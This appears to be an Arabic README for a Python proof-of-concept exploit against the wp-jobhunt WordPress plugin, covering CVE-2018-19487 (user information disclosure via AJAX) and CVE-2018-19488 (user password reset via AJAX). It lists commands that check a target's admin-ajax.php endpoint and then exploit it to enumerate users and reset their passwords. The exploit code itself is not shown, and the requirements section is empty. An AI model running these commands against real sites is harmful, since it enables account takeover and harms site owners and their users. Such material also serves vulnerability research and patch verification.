
CVE-2018-19487, CVE-2018-19488, استغلال لإضافة wp-jobhunt في WordPress
CVE-2018-19487, CVE-2018-19488, استغلال لملحق wp-jobhunt لووردبريس
ملحق wp-jobhunt هو ملحق يُستخدم مع ثيم JobCareer:
https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 (انظر سجل التغييرات في الأسفل)
استغلال Python لـ CVE-2018-19487 (كشف معلومات المستخدم عبر AJAX) و CVE-2018-19488 (إعادة تعيين كلمة مرور المستخدم عبر AJAX) للإصدار 2.2 وما قبله.
المتطلبات:
كيفية الاستخدام:
تحقق من قابلية التعرض لتعداد المستخدمين:
python poc.py --checkenum https://wpsite/path/to/wp-admin/admin-ajax.php
تحقق من قابلية التعرض لإعادة تعيين كلمة المرور:
python poc.py --checkreset https://wpsite/path/to/wp-admin/admin-ajax.php
استغل تعداد المستخدمين:
python poc.py --enum https://wpsite/path/to/wp-admin/admin-ajax.php
استغل إعادة تعيين كلمة المرور:
python poc.py --reset https://wpsite/path/to/wp-admin/admin-ajax.php